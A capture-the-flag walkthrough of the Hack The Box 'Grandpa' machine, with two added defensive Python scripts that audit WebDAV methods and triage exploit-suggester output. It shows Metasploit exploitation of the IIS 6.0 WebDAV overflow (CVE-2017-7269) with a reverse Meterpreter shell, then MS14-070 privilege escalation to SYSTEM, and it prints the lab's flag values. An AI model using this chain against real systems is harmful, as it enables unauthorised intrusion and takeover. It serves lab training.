- References
CVE-2017-7269 : Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
CVE-2014-4076 : Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)
- This box is similar to the Granny box just before it, so I proceeded with a similar flow.
# nmap -sV -sT -sC -Pn 10.10.10.14
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
| Target_Name: GRANPA
| NetBIOS_Domain_Name: GRANPA
| NetBIOS_Computer_Name: GRANPA
| DNS_Domain_Name: granpa
| DNS_Computer_Name: granpa
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Date: Thu, 03 Jun 2021 03:35:30 GMT
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Confirmed that WebDAV is enabled on IIS 6.0.
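From the defender's side, the same nmap output is the evidence you would use to decide whether this WebDAV exposure is acceptable. The following is an added example, not code from the original writeup or from nmap: it parses the http-methods and http-webdav-scan lines shown above (copied here as a constructed sample) and sorts the advertised methods into write, disclosure and safe tiers. The tier membership and the function names are this example's own choices.

```python
"""Audit the HTTP methods an nmap scan reports for an IIS/WebDAV host.

Added example (not part of the original post). Parses the plain-text
output of nmap's http-methods and http-webdav-scan scripts and classifies
each advertised method by the risk it carries when exposed to anonymous
clients. The tiers below are this example's own grouping.
"""
import re

# Methods that let a client write, move or delete content or lock resources.
# Advertising them to anonymous clients on a public IIS 6.0 host is the
# misconfiguration the nmap http-methods script flags as "potentially risky".
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH",
                 "LOCK", "UNLOCK"}
# Methods that reveal server-side structure or enable cross-site tracing.
DISCLOSURE_METHODS = {"TRACE", "PROPFIND", "SEARCH"}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "POST"}

# Constructed sample: the relevant lines of the nmap output in the post.
SAMPLE_SCAN = """\
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
"""

# nmap prefixes script lines with "| " or "|_ "; the three fields below are
# the ones that carry method lists.
_METHOD_LINE = re.compile(
    r"^\|_?\s*(Allowed Methods|Public Options|Potentially risky methods):\s*(.*)$"
)


def parse_methods(scan_text):
    """Return {field_name: set(methods)} for every method list in the scan."""
    found = {}
    for line in scan_text.splitlines():
        m = _METHOD_LINE.match(line.strip())
        if not m:
            continue
        field, methods = m.group(1), m.group(2)
        # Lists are comma-separated in http-webdav-scan and space-separated
        # in http-methods, so split on either.
        found[field] = {tok.upper() for tok in re.split(r"[,\s]+", methods) if tok}
    return found


def classify(methods):
    """Split a method set into write, disclosure, safe and unknown tiers."""
    known = WRITE_METHODS | DISCLOSURE_METHODS | SAFE_METHODS
    return {
        "write": sorted(methods & WRITE_METHODS),
        "disclosure": sorted(methods & DISCLOSURE_METHODS),
        "safe": sorted(methods & SAFE_METHODS),
        "unknown": sorted(methods - known),
    }


def audit(scan_text):
    """Classify the union of every method list the scan reports.

    'Public Options' (answer to OPTIONS *) is the server-wide list while
    'Allowed Methods' is per-resource; taking the union ensures a method
    enabled anywhere is counted.
    """
    fields = parse_methods(scan_text)
    exposed = set().union(*fields.values()) if fields else set()
    report = classify(exposed)
    # Any of these verbs implies the WebDAV extension is active.
    report["webdav_enabled"] = bool(
        exposed & {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}
    )
    return report


if __name__ == "__main__":
    for tier, methods in audit(SAMPLE_SCAN).items():
        print(f"{tier:16s} {methods}")
```

On the host in the post the audit reports every write method enabled and WebDAV active; the remediation a defender would look for is disabling the WebDAV extension (or at minimum the write verbs) for anonymous clients, which an empty "write" tier on a rescan would confirm.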
# msfconsole
msf6 > search iis 6.0 webdav
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
- Searching for IIS 6.0 WebDAV vulnerabilities turned up the module above.
msf6 > use 0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.16
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
- After setting the target, I tried the exploit.
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.14:1031) at 2021-06-02 23:42:16 -0400
meterpreter > shell
Process 2308 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
- On entering the shell, I confirmed that it was running as the nt authority\network service account.
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:12 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 05:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,092,687,360 bytes free
C:\Documents and Settings>cd Harry
cd Harry
Access is denied.
- Access to the directory where the user flag was expected to be was denied, and the same was true for Administrator. Wondering whether there was a higher privilege than this account, I searched for information on nt authority\network service privilege escalation and learned that the answer is nt authority\system.
- I then used the local exploit suggester to check whether escalation to SYSTEM was possible.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search local suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
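The suggester output above is also useful on the blue-team side as a patch-verification list. The following is an added example, not code from the original writeup or from Metasploit: it parses the `[+]` result lines (copied here as a constructed sample), separates modules whose check the suggester confirmed from those it could not validate, and derives the Microsoft bulletin identifier (for example MS14-070) from the `msYY_NNN` prefix of the module name so the findings can be checked against the host's installed updates. Modules without such a prefix are reported separately for manual lookup.

```python
"""Triage Metasploit local_exploit_suggester output into a patch-check list.

Added example (not part of the original post and not Metasploit code).
Parses the result lines the suggester prints, records which checks were
confirmed, and maps module names to Microsoft bulletin IDs where the
module name carries one.
"""
import re

# Constructed sample: the suggester output shown in the post.
SAMPLE_OUTPUT = """\
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
"""

# "[+] <host> - <module>: <verdict>"
_RESULT = re.compile(r"^\[\+\]\s+(\S+)\s+-\s+(exploit/\S+?):\s+(.*)$")
# Module basenames such as ms14_070_tcpip_ioctl start with the bulletin.
_BULLETIN = re.compile(r"^ms(\d{2})_(\d{3})")

CONFIRMED_TEXT = "The target appears to be vulnerable"


def bulletin_id(module):
    """Map 'exploit/windows/local/ms14_070_tcpip_ioctl' to 'MS14-070', else None."""
    m = _BULLETIN.match(module.rsplit("/", 1)[-1])
    return f"MS{m.group(1)}-{m.group(2)}" if m else None


def parse_suggester(text):
    """Return one dict per [+] result line: host, module, bulletin, confirmed."""
    findings = []
    for line in text.splitlines():
        m = _RESULT.match(line.strip())
        if not m:
            continue  # progress lines ([*]) and unrelated warnings are skipped
        host, module, verdict = m.groups()
        findings.append({
            "host": host,
            "module": module,
            "bulletin": bulletin_id(module),
            # "could not be validated" results are kept but not treated as confirmed
            "confirmed": verdict.startswith(CONFIRMED_TEXT),
        })
    return findings


def missing_bulletins(text):
    """Bulletins whose check was confirmed: the updates to verify first."""
    return sorted({f["bulletin"] for f in parse_suggester(text)
                   if f["confirmed"] and f["bulletin"]})


def unmapped_modules(text):
    """Confirmed modules with no bulletin in their name; need manual lookup."""
    return sorted(f["module"] for f in parse_suggester(text)
                  if f["confirmed"] and not f["bulletin"])


def unvalidated_bulletins(text):
    """Bulletins the suggester saw a matching service for but could not confirm."""
    return sorted({f["bulletin"] for f in parse_suggester(text)
                   if not f["confirmed"] and f["bulletin"]})


if __name__ == "__main__":
    print("confirmed missing:", missing_bulletins(SAMPLE_OUTPUT))
    print("needs lookup:     ", unmapped_modules(SAMPLE_OUTPUT))
    print("unvalidated:      ", unvalidated_bulletins(SAMPLE_OUTPUT))
```

For this host the confirmed list is MS14-058, MS14-070 and MS15-051, with ppr_flatten_rec left for manual mapping; the two "could not be validated" entries are worth checking as well, since the suggester only says it could not decide, not that the patch is present.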
- I chose an exploit that fit the target and tried it, but it failed with the error below.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit
[*] Started reverse TCP handler on 10.10.14.16:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
- It looked like a warning that a getsid attempt had failed, so I went back into the shell of the existing session and ran getuid, which revealed the problem.
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
- The privileges did not seem to be applied correctly. So, as I had done on Granny, I migrated into a process that was actually running as NT AUTHORITY\NETWORK SERVICE, ran getuid again, and this time it returned the expected result.
meterpreter > migrate 1828
[*] Migrating from 2328 to 1828...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
- Running the local exploit again after that worked.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.16:4444 -> 10.10.10.14:1032) at 2021-06-03 00:27:49 -0400
- Below are the flags.
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b